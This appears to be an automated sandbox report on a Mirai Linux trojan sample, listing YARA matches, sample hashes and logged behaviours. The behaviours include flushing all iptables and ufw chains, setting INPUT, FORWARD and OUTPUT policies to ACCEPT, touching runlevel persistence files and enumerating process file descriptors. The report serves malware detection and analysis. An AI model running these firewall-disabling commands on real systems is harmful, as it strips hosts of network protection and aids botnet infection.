Source: 6225.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp, type: MEMORY	Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 6225.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp, type: MEMORY	Matched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
Source: 6486.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
Source: 6486.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp, type: MEMORY	Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 6486.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp, type: MEMORY	Matched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
Source: 6483.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
Source: 6483.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp, type: MEMORY	Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 6483.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp, type: MEMORY	Matched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
Source: 6479.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
Source: 6479.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp, type: MEMORY	Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 6479.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp, type: MEMORY	Matched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research

Source: classification engine

Classification label: mal100.troj.linELF@0/3@1/0

Persistence and Installation Behavior

Deletes all firewall rules

Source: /bin/sh (PID: 6231)	Args: iptables -F	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6281)	Args: iptables -F ufw-logging-deny	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6282)	Args: iptables -F ufw-logging-allow	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6283)	Args: iptables -F ufw-not-local	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6284)	Args: iptables -F ufw-user-logging-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6285)	Args: iptables -F ufw-user-limit-accept	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6286)	Args: iptables -F ufw-user-limit	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6287)	Args: iptables -F ufw-skip-to-policy-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6288)	Args: iptables -F ufw-reject-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6289)	Args: iptables -F ufw-after-logging-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6290)	Args: iptables -F ufw-after-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6291)	Args: iptables -F ufw-user-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6292)	Args: iptables -F ufw-before-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6293)	Args: iptables -F ufw-before-logging-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6294)	Args: iptables -F ufw-skip-to-policy-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6295)	Args: iptables -F ufw-reject-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6296)	Args: iptables -F ufw-after-logging-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6297)	Args: iptables -F ufw-after-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6298)	Args: iptables -F ufw-user-logging-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6299)	Args: iptables -F ufw-user-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6300)	Args: iptables -F ufw-before-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6301)	Args: iptables -F ufw-before-logging-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6302)	Args: iptables -F ufw-track-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6303)	Args: iptables -F ufw-track-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6304)	Args: iptables -F ufw-track-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6305)	Args: iptables -F ufw-skip-to-policy-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6306)	Args: iptables -F ufw-reject-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6307)	Args: iptables -F ufw-after-logging-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6308)	Args: iptables -F ufw-after-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6309)	Args: iptables -F ufw-user-logging-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6310)	Args: iptables -F ufw-user-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6311)	Args: iptables -F ufw-before-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6312)	Args: iptables -F ufw-before-logging-output	Jump to behavior

Executes the "iptables" command to insert, remove and/or manipulate rules

Source: /bin/sh (PID: 6256)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -P INPUT ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6259)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -P FORWARD ACCEPT	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6281)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-logging-deny	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6282)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-logging-allow	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6283)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-not-local	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6284)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-user-logging-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6285)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-user-limit-accept	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6286)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-user-limit	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6287)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-skip-to-policy-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6288)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-reject-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6289)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-after-logging-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6290)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-after-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6291)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-user-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6292)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-before-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6293)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-before-logging-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6294)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-skip-to-policy-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6295)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-reject-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6296)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-after-logging-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6297)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-after-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6298)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-user-logging-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6299)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-user-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6300)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-before-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6301)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-before-logging-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6302)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-track-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6303)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-track-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6304)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-track-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6305)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-skip-to-policy-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6306)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-reject-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6307)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-after-logging-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6308)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-after-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6309)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-user-logging-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6310)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-user-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6311)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-before-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6312)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-before-logging-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6345)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-logging-deny	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6346)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-logging-allow	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6347)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-not-local	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6348)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-user-logging-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6349)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-user-logging-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6350)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-user-logging-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6351)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-user-limit-accept	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6352)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-user-limit	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6353)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-user-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6354)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-user-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6355)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-user-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6356)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-skip-to-policy-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6357)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-skip-to-policy-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6358)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-skip-to-policy-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6359)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -P INPUT ACCEPT	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6360)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -P OUTPUT ACCEPT	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6361)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -P FORWARD ACCEPT	Jump to behavior

Sample tries to persist itself using System V runlevels

Source: /usr/sbin/update-rc.d (PID: 6464)

File: /etc/rcS.d/K01ufw

Jump to behavior

Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/6234/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/2033/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1582/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/2275/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1612/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1579/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1699/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1335/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1698/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/2028/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1334/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1576/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/2302/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/3236/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/2025/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/2146/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/912/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/912/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/759/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/759/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/2307/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/918/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/918/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/6483/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1594/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/2285/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/2281/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1349/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1623/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/761/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/761/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1622/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/884/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/884/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1983/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/2038/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1586/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1465/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1344/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1860/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1463/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/2156/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/800/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/800/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/801/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/801/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1629/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1627/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1900/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/491/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/491/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/2294/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/2050/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1877/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/772/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/772/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1633/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1599/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1632/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1477/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/774/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/774/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1476/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1872/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/2048/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1475/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/2289/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/777/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/777/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/658/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/658/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/936/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/936/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1639/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1638/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/2208/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/2180/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1809/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1494/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1890/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/2063/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/2062/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1888/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1886/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1489/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/785/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/785/fd	Jump to behavior
